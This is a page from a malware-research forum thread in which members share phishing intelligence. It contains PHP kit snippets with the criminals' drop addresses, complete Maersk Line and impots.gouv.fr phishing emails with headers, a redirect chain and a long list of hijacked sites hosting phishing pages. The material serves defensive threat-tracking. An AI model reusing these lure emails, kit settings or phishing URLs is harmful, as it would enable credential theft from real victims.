Phish-BankFraud - Page 5 - KernelMode.info

Apple and Paypal

#24986 by bi0
Sun Jan 18, 2015 12:48 am

http://www.phishtank.com/phish_detail.p ... id=2919571

Apple Phishing :

$bilsnd = "himvbv@yahoo.com";
$bilsub = "Your Welcomme | Fr0m $ip";

Paypal Phishing :

Code: Select all

$to = "junkyy@laposte.net";

paypal.zip

infected
(740.85 KiB) Downloaded 75 times

itun.zip

infected
(225.63 KiB) Downloaded 70 times

Username

bi0

Posts

Joined

Sat Jan 17, 2015 10:00 am

Re: Phish-BankFraud

#25004 by Pr0xymu5
Mon Jan 19, 2015 9:34 pm

The paypal and apple are the most popular website targeted to phishing.

I can see that, statistically average time to block phishing website is between 1-4 days. This is to long....

Username

Pr0xymu5

Posts

Joined

Sun Aug 31, 2014 8:24 pm

Re: Phish-BankFraud

#26446 by malwarelabs
Wed Aug 05, 2015 3:21 pm

Yahoo / Outlook / Google / 163.com
Phishing kit
rhuth247@gmail.com

attached

Attachments

phishKit.7z

infected
(250.01 KiB) Downloaded 60 times

Username

malwarelabs

Posts

Joined

Tue Dec 10, 2013 9:07 am

Re: Phish-BankFraud

#26579 by Xylitol
Sat Aug 22, 2015 7:16 pm

Maersk Line spam.

Code: Select all

x-store-info:4r51+eLowCe79NzwdU2kR3P+ctWZsO+J
Authentication-Results: hotmail.com; spf=none (sender IP is 180.149.240.133) smtp.mailfrom=dilip.margam@smlisuzu.com; dkim=none header.d=smlisuzu.com; x-hmca=none header.id=dilip.margam@smlisuzu.com
X-SID-PRA: dilip.margam@smlisuzu.com
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTmthuQbo0UropEGRhdfu+Wk/r50eaSaFPHqB6USKRgRGI/mNHCkQDPBNDC9LlyslRC3UYpbihQbbYS4hzcrWyUd6Vz5lO+c8PEMEIIrCTACA+bfM73k+oG69VJ6RMyWjYV0/crDxfe9jWjEUhzt+FGG//2uvN8oKGHUfMNo6VDQCK5rIjsoRhthRy4PJ7irpHzfYUp2LehjP6PBxmYg6gtnrI0/k5MILWiyLC0suvxN+w==
Received: from mithiskyconnect.com ([180.149.240.133]) by COL004-MC1F9.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.23143);
	 Thu, 20 Aug 2015 00:55:00 -0700
Received: from Internal Mail-Server by MS-ScanA (envelope-from
	dilip.margam@smlisuzu.com) with SMTP; 20 Aug 2015 13:15:13 +0530
Received: from mail7.mithiskyconnect.com (localhost.localdomain [127.0.0.1])
	by mail7.mithiskyconnect.com (SMF) with ESMTP id 6A2CDA00097 for
	<**********@live.fr>; Thu, 20 Aug 2015 13:15:37 +0530 (IST)
Received: from mail7.mithi.com (localhost.localdomain [127.0.0.1]) by
	mail7.mithiskyconnect.com (bulkSplit) with ESMTP id 5F8939E0038 for
	<**********@live.fr>; Thu, 20 Aug 2015 13:15:37 +0530 (IST)
Received: from 212.174.253.33 by Mail7 (envelope-from
	<dilip.margam@smlisuzu.com>, uid 0)  with qmail-scanner-1.25 (clamscan:
	0.60. Clear:RC:0(212.174.253.33) :. Processed in 0.174539 secs); Thu, 20 Aug
	2015 07:45:37 +0000
Received: from unknown (HELO WIN-S34SBKF5SVH.kolej.ankara) 
	(dilip.margam@smlisuzu.com@[212.174.253.33]) (envelope-sender
	<dilip.margam@smlisuzu.com>)  by 0 (qmail-ldap-1.03) with SMTP for
	<**********@live.fr>; Thu, 20 Aug 2015 07:45:37 +0000
Content-Type: multipart/alternative; boundary="===============1584738297=="
MIME-Version: 1.0
Subject: Bill Of Lading
To: **********@live.fr
From: "Customer Service" <dilip.margam@smlisuzu.com>
Date: Thu, 20 Aug 2015 00:45:34 -0700
X-Qmail-Scanner-Message-ID: <144005673768730062@Mail7>
Message-Id: <20150820074537.5F8939E0038@mail7.mithiskyconnect.com>
VadeRetro-Refid: SPAM, OK,
	(300)(1000)gggruggvucftvghtrhhoucdtuddrfeekfedrgeejgdduudehucetufdoteggodetrfcurfhrohhfihhlvgemucfrkffpgfetrffrnecuuegrihhlohhuthemuceftddtnecuogfrhhhishhhihhnghdqteefjeegqdduieculdeftddtmdenucfjughrpegtggfuvffhsegrtddtredttddunecuhfhrohhmpedfvehushhtohhmvghrucfuvghrvhhitggvfdcuoeguihhlihhprdhmrghrghgrmhesshhmlhhishhuiihurdgtohhmqeenucffohhmrghinheprghlihgsrggsrgdrtghomhdpfhhrihhtvghrihgvtghrohgtohguihhlvgdrtghomh
Spam-Score: 100.00
Return-Path: dilip.margam@smlisuzu.com
X-OriginalArrivalTime: 20 Aug 2015 07:55:01.0489 (UTC) FILETIME=[845BD610:01D0DB1D]

You will not see this in a MIME-aware mail reader.
--===============1584738297==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =20
  Dear **********@live.fr,
  This is to notify you that you have a Shipment alert and Details  .
  For safety purpose  VIEW HERE  Bill of lading and invoice document to login your email on our secure Portal.
  Best Regards
 Customer Service
   =A9 2015 Maersk Line A/S. All rights reserved.
=20


 



--===============1584738297==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html>

<head>
<meta http-equiv=3D=22Content-Language=22 content=3D=22en-us=22>
<meta http-equiv=3D=22Content-Type=22 content=3D=22text/html; charset=3Diso=
-8859-1=22>
<title>New Page 2</title>
</head>

<body>

<p style=3D=22color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-siz=
e: medium; font-style: normal; font-variant: normal; font-weight: normal; l=
etter-spacing: normal; line-height: normal; orphans: auto; text-align: star=
t; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; =
word-spacing: 0px; -webkit-text-stroke-width: 0px;=22>
<img src=3D=22http://www.maerskline.com/=7E/media/maersk-line/brand-assets/=
MaerskLine-logo.png=22 height=3D=2236=22 width=3D=22162=22></p>
<p style=3D=22color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-siz=
e: medium; font-style: normal; font-variant: normal; font-weight: normal; l=
etter-spacing: normal; line-height: normal; orphans: auto; text-align: star=
t; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; =
word-spacing: 0px; -webkit-text-stroke-width: 0px;=22>
Dear phoenixbytes=40live.fr,</p>
<p style=3D=22color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-siz=
e: medium; font-style: normal; font-variant: normal; font-weight: normal; l=
etter-spacing: normal; line-height: normal; orphans: auto; text-align: star=
t; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; =
word-spacing: 0px; -webkit-text-stroke-width: 0px;=22>
This is to notify you that you have a Shipment alert and Details&nbsp; .</p=
>
<p style=3D=22color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-siz=
e: medium; font-style: normal; font-variant: normal; font-weight: normal; l=
etter-spacing: normal; line-height: normal; orphans: auto; text-align: star=
t; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; =
word-spacing: 0px; -webkit-text-stroke-width: 0px;=22>&nbsp;For
<span style=3D=22color: =23000000=22><span class=3D=22Apple-converted-space=
=22>safety purpose
</span><a href=3D=22http://friteriecrocodile.com/awstats/maerskline/SHIPPIN=
GDOCUMENT.htm=22>
VIEW HERE </a></span><span class=3D=22Apple-converted-space=22>&nbsp;Bill o=
f lading and=20
invoice document </span>to login your email on our secure Portal.</p>
<p style=3D=22color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-siz=
e: medium; font-style: normal; font-variant: normal; font-weight: normal; l=
etter-spacing: normal; line-height: normal; orphans: auto; text-align: star=
t; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; =
word-spacing: 0px; -webkit-text-stroke-width: 0px;=22>
Best Regards<br>
Customer Service</p>
<p style=3D=22color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-sty=
le: normal; font-variant: normal; font-weight: normal; letter-spacing: norm=
al; line-height: normal; orphans: auto; text-align: start; text-indent: 0px=
; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; =
-webkit-text-stroke-width: 0px=22>
<a data-spm-anchor-id=3D=22a2700.7224109.a271py.79=22 rel=3D=22nofollow=22 =
href=3D=22http://www.alibaba.com/trade/servlet/page/static/copyright_policy=
=22>
<span style=3D=22text-decoration: none;=22><font color=3D=22=23808080=22 si=
ze=3D=222=22>=A9</font></span></a><font=20color=3D=22=23808080=22=20size=3D=
=222=22><span=20class=3D=22Apple-converted-space=22>&nbsp;</span>2015=20=0A=
Maersk=20Line=20A/S.=20All=20rights=20reserved.</font></p>=0A=0A<br><br>=0D=
=0A=20<br>=0D=0A</body>=0A=0A</html>=0A<br>


--===============1584738297==--

Code: Select all

$recipient = "madnesstune@gmail.com";

Attachments

maerskline.zip

infected
(396.14 KiB) Downloaded 55 times

Registration Problems and FAQ - Rules For Malware Requests

Username

Xylitol

Rank

Global Moderator

Posts

1706

Joined

Sat Apr 10, 2010 5:54 pm

Location

Seireitei, Soul Society

Contact

Re: Phish-BankFraud

#26597 by Xylitol
Mon Aug 24, 2015 4:00 pm

Apple (Deutschland)
fochappele.com/authm/

Code: Select all

$SEND="acaysoah@gmail.com"; // YORUR EMAIL

Crédit Agricole/Free (France)
Redirector:

Code: Select all

hxxp://rtolat.com/kar<email-victim>

---

--21:47:58--  http://rtolat.com/kar
           => `kar'
Connecting to rtolat.com:80... connected!
HTTP request sent, awaiting response... 302 Found
Location: http://leguidefr.com/frex [following]
--21:47:59--  http://leguidefr.com/frex
           => `frex'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://leguidefr.com/frex/ [following]
--21:47:59--  http://leguidefr.com/frex/
           => `index.html'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: login [following]
--21:47:59--  http://leguidefr.com/frex/login
           => `login'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://leguidefr.com/frex/login/ [following]
--21:47:59--  http://leguidefr.com/frex/login/
           => `index.html'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: 1ce3fb25c96b23343cd11444c97becb5 [following]
--21:47:59--  http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5
           => `1ce3fb25c96b23343cd11444c97becb5'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/ [following]
--21:47:59--  http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/
           => `index.html'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: subscribe [following]
--21:48:00--  http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/subscribe
           => `subscribe'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/subscribe/ [following]
--21:48:00--  http://leguidefr.com/frex/login/1ce3fb25c96b23343cd11444c97becb5/subscribe/
           => `index.html'
Connecting to leguidefr.com:80... connected!
HTTP request sent, awaiting response... 200 OK

leguidefr.com/ma/ma/
◉ http://urlquery.net/screenshot.php?id=1440430832803
◉ http://urlquery.net/screenshot.php?id=1440430757366

Code: Select all

$mail_to = "gwicvv@gmail.com,jaspercullen2014@gmail.com";

Free:

Code: Select all

$send = "rezq.fanniche@gmail.com";

◉ http://urlquery.net/screenshot.php?id=1440433212653

The small mention (BlackHat) takes all its meaning.

Attachments

free.zip

infected
(97.65 KiB) Downloaded 48 times

fr.zip

infected
(1.93 MiB) Downloaded 54 times

Apple.zip

infected
(1.12 MiB) Downloaded 57 times

Registration Problems and FAQ - Rules For Malware Requests

Username

Xylitol

Rank

Global Moderator

Posts

1706

Joined

Sat Apr 10, 2010 5:54 pm

Location

Seireitei, Soul Society

Contact

Re: Phish-BankFraud

#26619 by Xylitol
Sun Aug 30, 2015 10:57 am

Quick follow-up on a 'impots.gouv.fr' phishing campaign.

Malicious/hijacked domains collected for the moment:

Code: Select all

http://5gdhtecza.zhr.pl/wp-content/uploads/web/account/redirection.php
http://acadtransportes.com.br/wp-content/plugins/-/index/index/6c8c17253b76a5bbf24075433026546d/d2f5c0aa5d2360c3709712829a4a81f4/redirection.php
http://acadtransportes.com.br/wp-includes/js/-/index/index/c79849d92bb35961d8fdce29a5bd6edc/58b66a520120f64e8b6e0528eb44f102/redirection.php
http://acadtransportes.com.br/wp-includes/js/-/index/index/c79849d92bb35961d8fdce29a5bd6edc/6a45ba1bdbf714477d972edfe5097b66/redirection.php
http://atelier-fenix.pl/fenix/javacss/mporeturn/redirection.php
http://cbs.irkutsk.ru/old/hron2009/images/mporeturn/redirection.php
http://closetdesign.com.sg/tmp/verification-compte-impots.gouv.fr/pots/file/9880236b31aaf6ae42b242572150e758/redirection.php
http://comptoneye.com/myopia/.idea/scopes/index/index/f46fe45753f81c452cd353ace0a26fcb/357e7ecf3118bc1f7a3bab80b642cccb/redirection.php
http://ddancefactory.com/wp-content/themes/twentyfourteen/images/homey/homey/homey/homey/homey/homey/redirection.php
http://dentalcaresrilanka.com/wp-admin/js/impots-verification-information-fr/pots/file/1ef1a9cf2d5f02436c7e2bcbfe1c1bf7/redirection.php
http://emscaribbean.com/wp-content/themes/ems/inc/1/homey/homey/redirection.php
http://fonac.org.br/ddd/cps/rbrsdeptement/redirection.php
http://fonac.org.br/phputf9/checkingtaxe/redirection.php
http://fonac.org.br/phputf9/publicfinance/redirection.php
http://fonac.org.br/ppchecker/directionmpo/redirection.php
http://fonac.org.br/tgfls/checkingtaxe/redirection.php
http://fonac.org.br/tgfls/rbrsdeptement/redirection.php
http://gartenmoebelgigant.de/skin/frontend/default/garmoe-2013/images/france/impots.gouv.fr/faec799acb4273152a1e892e564188c9/redirection.php
http://glamorgandrivingschool.co.uk/impots.rembouresement/id/6737f37158e60c29f5151b32384e230f/redirection.php
http://godshandmin.org/home/Client-informations/confirmer-statut/impots/imp/a0e8c60bb0ed41291e0947709cfd5c1d/redirection.php
http://gzump.com/rdr/impots.gouv.fr/297c032181f4dcc3064581f8fb7435ae/redirection.php
http://hghsuppliers.com/blog/img/apps/homey/redirection.php
http://host210.200-43-196.telecom.net.ar/sctip/libraries/fr/impots-gouv.fr/file/31787c013d91bc99c32a8c707e6a1c3a/redirection.php
http://impots-gouv-fr.ballerinafarmer.com/www.impots.gouv.fr/a546af8606eb6a7dc52f9cc7b01d9fc7/redirection.php
http://impots-gouv-fr.jimstile.com/www.impots.gouv.fr-1/136667654925713415e46544184c2664/redirection.php
http://impots-gouv-fr.jimstile.com/www.impots.gouv.fr-4/6b53f9ca294b5253b1e0e98b9aa30e54/redirection.php
http://impots-gouv.fr.zianigroup.com/www.impots.gouv.fr-3/35a65270c1765dfb6d181b48995c3b9b/redirection.php
http://impots-gouv.fr.zianigroup.com/www.impots.gouv.fr-4/8ef142c8cccd5af3af7813949c45dc3f/redirection.php
http://impots.gouv.fr.latexindia.in/www.impots.gouv.fr/file/64d916e66d670ca0de5599480723494b/redirection.php
http://impots.gouv.fr.marianaes.in/www.impots.gouv.fr/file/4e0ada84d6962a3728dfb8de44d41202/redirection.php
http://impots.gov.france.service-maintenance-informatique.org/www.impots.gouv.fr-1/12f5a1e14b5bff8dc15755a485a49585/redirection.php
http://impots.gov.france.service-maintenance-informatique.org/www.impots.gouv.fr-2/5763ae9029a14e8422da1b2e99f24300/redirection.php
http://impots.gov.france.service-maintenance-informatique.org/www.impots.gouv.fr-3/1694c6e64ac7020d46a4879ab15a3db2/redirection.php
http://impots.gov.france.service-maintenance-informatique.org/www.impots.gouv.fr-3/d625d63587d3d82b74bf9acaa76a1f86/redirection.php
http://impots.gov.france.service-maintenance-informatique.org/www.impots.gouv.fr-4/fd0bed0d69cbd944b82f7810bda87c37/redirection.php
http://impots.gov.service-maintenance-informatique.org/www.impots.gouv.fr-1/83a6c8cf0511ab15d4064bfc29d7eba2/redirection.php
http://impots.gov.service-maintenance-informatique.org/www.impots.gouv.fr-2/ae1945cc18582cc25951220268c793eb/redirection.php
http://impots.gov.service-maintenance-informatique.org/www.impots.gouv.fr-2/cf8fd9b832291b9f51aa044df8a934de/redirection.php
http://impots.gov.service-maintenance-informatique.org/www.impots.gouv.fr-3/c1ff77ce7ce0b9db2ed16fe13313c67d/redirection.php
http://impots.gov.service-maintenance-informatique.org/www.impots.gouv.fr-4/9ab4a381dddaf94d414f14c814ee6419/redirection.php
http://komidi.re/wp-content/plugins/impots.gouv.fr/405c547bdaf082c727fb5eae5f03fb19/redirection.php
http://komidi.re/wp-content/plugins/intense/impots.gouv.fr/0a2bab9355243563a7e3037b9de453fe/redirection.php
http://lafourno.com/images/stories/impots.gouv.fr/file/imp-ghx333/redirection.php
http://milenshop.vinaglobe.vn/Notification/impots.gouv.fr/file/3e2cf538783a06d456451333ffb1dec7/redirection.php
http://milenshop.vinaglobe.vn/Notification/impots.gouv.fr/file/41114d58b2087731b00c39dc4ae4f92a/redirection.php
http://milenshop.vinaglobe.vn/Notification/impots.gouv.fr/file/60a7bbc1c1415e3cc6e230e939585097/redirection.php
http://milenshop.vinaglobe.vn/Notification/impots.gouv.fr/file/7343e67a941284abfaa5427945fd4d51/redirection.php
http://milenshop.vinaglobe.vn/Notification/impots.gouv.fr/file/d2e004f0c2be6be75a6cac60d4e6616a/redirection.php
http://petraproperty.co.id/Notification/impots.gouv.fr/file/47fc7040cfc4c972d3d2ff8df0922882/redirection.php
http://phillipspinturaydecoracion.es/wp-content/themes/twentyeleven/imp/a7a91f03c4c73e34b05e05911eca9d38/redirection.php
http://positivecommerce.com/baseinstall/cache/modvirtu/a1/homey/homey/redirection.php
http://positivecommerce.com/baseinstall/cache/modvirtu/a2/homey/homey/redirection.php
http://positivecommerce.com/baseinstall/cache/modvirtu/a3/homey/homey/redirection.php
http://positivecommerce.com/baseinstall/cache/modvirtu/a4/homey/homey/redirection.php
http://positivecommerce.com/baseinstall/cache/modvirtu/a5/homey/homey/redirection.php
http://positivecommerce.com/baseinstall/cache/modvirtu/a6/homey/homey/redirection.php
http://positivecommerce.com/baseinstall/images/banners/2/homey/homey/redirection.php
http://positivecommerce.com/j15temptest/packageip/endo/checkingtaxe/redirection.php
http://positivecommerce.com/mambots/editors-xtd/osimaalpha/checkingtaxe/redirection.php
http://positivecommerce.com/mambots/editors-xtd/osimaalpha/directionmpo/redirection.php
http://recouvrement-f-secure-accountimpot-gouv.com/service-impot.gouvfrance.fr/redirection.php
http://recouvrement-info-accountapplstore.com/info-impot.gouvfrance.fr/redirection.php
http://secure34.prodns.com.br/~lacdecor/compte-verification-impots-fr/pots/file/ac121559b5bafb077eb14cbaff896e61/redirection.php
http://semcoteakproducts.ca/js/LoginAccess3/impots.gouv.fr/69809339581410a9f9dfaad27e5015a5/redirection.php
http://semcoteakproducts.ca/js/LoginAccess3/impots.gouv.fr/d689f5d1d7cb65ed7170b8e71b4acd2b/redirection.php
http://srv34.prodns.com.br/~lacdecor/compte-verification-impots-fr/pots/file/ac121559b5bafb077eb14cbaff896e61/redirection.php
http://sweetlifestevia.ca/wp-includes/images/smilies/Impots.gouv2015/redirection.php
http://tannaris.si/tmp/impots.rembouresement.fr/id/08720a62f8b9637c6577367c6cfd371f/redirection.php
http://thefashionlist.com/program/identiti/impots.gouv.fr/file/098e8eebbd7af7f6ef59e36e53aabe83/redirection.php
http://theshophd.com/sites/all/libraries/jplayer/imp-ghx333/redirection.php
http://thisishealthful.com/impots.rembouresement.fr/id/40dade3bc0a44959493b60d09a7ee42c/redirection.php
http://thisishealthful.com/impots.rembouresement.fr/id/8e64e36576ae18ffb76b0e0f16b98840/redirection.php
http://vikastabla.com/home/logs/impots/d2e43df6f856e8eb9208c1d941bab0e8/redirection.php
http://ville-gueret.fr/statsb/impots.gouv.fr/480a7728f8a38358abb834883dd52ab9/redirection.php
http://www.brume.ca/impots.rembouresement.fr/id/15cac4f084d582b47cd305629e559375/redirection.php
http://www.brume.ca/impots.rembouresement.fr/id/c881b6f53ad65ab935468a99ada58b7d/redirection.php
http://www.chestnutstoreys.com/wp-admin/impots/info/fr_FR/impots/gouv/remboursement/fr/imp-ghx333/redirection.php
http://www.fima.kz/components/com_contact/views/contact/tmpl/css/index/index/6734d6bb61faf2e7cdccbbb197462bcf/1e07655caf5920ca0321d9cc06dcb5dd/redirection.php
http://www.isayorganic.com/impt/a129846e14bc0ee554bd6b7f8d2327cf/redirection.php
http://www.komidi.re/wp-content/plugins/intense/impots.gouv.fr/aef0823ed9596ca5a7e27ba70534e696/redirection.php
http://www.komidi.re/wp-content/plugins/intense/impots.gouv.fr/bf41f4083bb9bcbafbae463beead36f7/redirection.php
http://www.komidi.re/wp-content/plugins/intense/impots.gouv.fr/f4826b54795aadb57a91edae9f344948/redirection.php
http://www.mejujuy.gov.ar/sctip/libraries/fr/impots-gouv.fr/file/31787c013d91bc99c32a8c707e6a1c3a/redirection.php
http://www.ovedroo.com/wp-includes/ID3/remboursement/Pays/France/127b280f1817677899dea16af27e44fb/redirection.php
http://www.parricide.nl/Notification/impots.gouv.fr/file/66ef90700c90c74548471ee174d710ea/redirection.php
http://www.phillipspinturaydecoracion.es/wp-content/themes/twentyeleven/imp/c5a6c2c96a10b8a147bfa3385d5abef8/redirection.php
http://www.recouvrement-f-secure-accountimpot-gouv.com/service-impot.gouvfrance.fr/redirection.php
http://www.recouvrement-fino-account-secure-impotgouv.com/service-impot.gouvfrance.fr/redirection.php
http://www.recouvrement-info-accountapplstore.com/info-impot.gouvfrance.fr/redirection.php
http://www.reouvrement-info-secure-accountimpot.com/Centre.Impot.Gouv.fr/redirection.php
http://www.rostovbroker.com/impots.rembouresement.fr/id/2dd1ecc301599770f7bb45eb5645f037/redirection.php
http://www.verifiateurgenerale-info-accountapplestorez.com/service-impot.gouvfrance.fr/redirection.php
http://www.youthpilgrimage.com/media/impot/a08eadff4ec418c6ec2b398f306d635e/redirection.php
http://youthpilgrimage.com/media/impot/23db74f07237b1a90343e6b3d0de9b2a/redirection.php
http://youthpilgrimage.com/media/impot/2d839b3805915850d4ddb5034ae0dbcf/redirection.php
https://www.girlynightsout.com/impots.gouv.fr/3963ef9d4a04fdedd864da7b8a4ec7aa/redirection.php
https://www.girlynightsout.com/impots.gouv.fr/48ba4a4e75b3c70fdb1104d05c6d0a81/redirection.php
https://www.girlynightsout.com/impots.gouv.fr/8765eb6c980fae84c0f762995f3a1fc2/redirection.php
https://www.girlynightsout.com/impots.gouv.fr/d7180d102a6cae7150c4ff6b6ddbdd41/redirection.php

We can note mejujuy.gov.ar as well as ville-gueret.fr (two administrative structures sites)

→ rosa.wpc.gov.lk used to send spam.

Code: Select all

x-store-info:4r51+eLowCe79NzwdU2kR0zqpsRfiBoycNOl1Rdc4We2piva5OFMIYkZ8ZcnMsOYQ6GY8Y10brp+5HpX1aqznyCrSgotCC4+ZXfQo0KngGSZYI+WbEu/aeAQac6MGtFme5W53rrn47c=
Authentication-Results: hotmail.com; spf=none (sender IP is 222.165.135.195) smtp.mailfrom=www-data@rosa.wpc.gov.lk; dkim=none header.d=dgfip.finances.gouv.fr; x-hmca=none header.id=impots.gouv@dgfip.finances.gouv.fr
X-SID-PRA: impots.gouv@dgfip.finances.gouv.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTngJmlahZDJ8EjQLaEW3nL5G3jG1XAvnSuFKQZhWbswaDYI25eOsYz6YK6RSFoMRBWnNPU3HFrfOHWCAwmEJPE+fNYLISPM+uY+P8yj4i0nk6rIPoAGnjensZPLBRAuHoPNuzp900SUDvVavsczpthKgUaQ8kYxOAZR+T6GvRacGswvkBMT/M02H4Vw0m5+WZUkEe+vz6oQFPRD4ac3L2Fcx/Xh4TmB+jPuFYZESwButA==
Received: from localhost ([222.165.135.195]) by BAY004-MC2F31.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.23143);
	 Thu, 27 Aug 2015 21:40:05 -0700
Received: by localhost (Postfix, from userid 33)
	id 30B471F712C; Fri, 28 Aug 2015 06:44:30 +0530 (IST)
Date: Fri, 28 Aug 2015 06:44:30 +0530
To: ************@live.fr
From: "Impots.gouv.fr" <impots.gouv@dgfip.finances.gouv.fr>
Reply-To: impots.gouv@dgfip.finances.gouv.fr
Subject: Important : Avis de remboursement !‏
Message-ID: <403424263c4534abff276f7087728dc2@wpc.gov.lk>
X-Priority: 3
X-Mailer: PHPMailer (phpmailer.sourceforge.net) [version ]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="iso-8859-1"
Return-Path: www-data@rosa.wpc.gov.lk
X-OriginalArrivalTime: 28 Aug 2015 04:40:06.0830 (UTC) FILETIME=[9D1A7CE0:01D0E14B]

<div class="ecxgmail_extra">
<div class="ecxgmail_quote">
<table height="302" align="center" border="0" cellpadding="0" cellspacing="0" width="623" style="color:rgb(34, 34, 34);font-family:arial, sans-serif;font-size:13px;padding:0px;border:0px none;border-spacing:0px;">
    <tbody style="padding:0px;border:0px;">
        <tr style="padding:0px;border:0px;">
            <td width="632" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;"><br />
             </td>
            <td valign="bottom" width="168" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;"> </td>
        </tr>
        <tr style="padding:0px;border:0px;">
            <td colspan="2" height="100" width="632" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;">
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"><img alt="" src="https://ci3.googleusercontent.com/proxy/S7Ecs1UTkIp5q8QItQKopJ7gqpByYD1qd-FDb8BRPQhiOpbq0jcCROmfh35zRiClxG3EGaRYlXkwBzwZez1YAqmhguSFmzQE4Afk=s0-d-e1-ft#http://sebastien-bruneau.fr/site/pluxml/images/RF.png" height="109" width="191" style="" /></p>
            </td>
        </tr>
        <tr style="padding:0px;border:0px;">
            <td colspan="2" height="25" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;"><br />
            <br />
            <br />
            <table border="0" cellpadding="10" cellspacing="0" width="100%" style="padding:0px;border:0px;border-spacing:0px;color:rgb(68, 68, 68);font-family:'Helvetica Neue', Helvetica, Arial, sans-serif;font-size:12px;">
                <tbody style="padding:0px;border:0px;">
                    <tr style="padding:0px;border:0px;">
                        <td width="45%" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;">Cher(e) client(e)<br />
                         </td>
                    </tr>
                    <tr style="padding:0px;border:0px;">
                        <td style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;color:rgb(136, 136, 136);">
                        <p style="padding:0px;line-height:1.3em;width:auto;"> </p>
                        <p style="padding:0px;line-height:1.3em;width:auto;">Après les derniers calculs de vos impots sur le revenu, nous avons déterminé que vous</p>
                        <p style="padding:0px;line-height:1.3em;width:auto;">êtes admissible à recevoir un remboursement d'un montant de 410.00 £</p>
                        <p style="padding:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"><span style="color:rgb(105, 105, 105);"><span style="font-size:11px;">Nous vous invitons à consulter les démarches a suivre en </span></span><font color="#5a5a5a" face="helvetica, arial, sans-serif" style="font-size:11px;line-height:14px;"><font color="#1155cc"><a href="http://www.recouvrement-info-accountapplstore.com/info-impot.gouvfrance.fr/redirection.php?g4d3bdOsiuarHDdBl0bEP6dBVy_wP1WJ6XZDh7nemRp9bv2mHJ0HYZaZV6xWExsS" target="_blank">cliquant-ici.</a></font></font></p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        </td>
                    </tr>
                </tbody>
            </table>
            </td>
        </tr>
    </tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" align="center" style="padding:0px;border-spacing:0px;color:rgb(68, 68, 68);font-family:Arial, Verdana, Helvetica, sans-serif;font-size:12px;width:490px;height:126px;">
    <tbody style="padding:0px;border:0px;">
        <tr style="padding:0px;border:0px;">
            <td width="632" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;">
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;">Cordialement,</p>
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;">impots.gouv.fr- Direction générale des Finances Publiques</p>
            </td>
        </tr>
    </tbody>
</table>
<blockquote class="ecxgmail_quote" style="border-left:1px #ccc solid;padding-left:1ex;"><br />
</blockquote></div>
</div>
</div>
<p><style type="text/css"><!--
.ExternalClass .ecxhmmessage P {
padding:0px;
}

.ExternalClass body.ecxhmmessage {
